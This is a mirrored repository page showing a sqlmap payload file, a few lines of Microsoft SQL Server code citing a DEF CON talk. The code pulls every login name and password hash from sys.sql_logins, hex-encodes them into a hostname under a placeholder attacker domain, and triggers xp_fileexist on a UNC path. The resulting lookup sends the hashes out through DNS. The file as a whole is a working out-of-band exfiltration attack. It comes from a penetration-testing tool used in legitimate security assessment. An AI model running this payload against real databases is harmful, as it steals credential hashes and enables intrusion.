mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-29 13:03:50 +03:00
5 lines
275 B
Plaintext
5 lines
275 B
Plaintext
# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
|
|
|
|
DECLARE @host varchar(1024);
|
|
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
|
|
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); |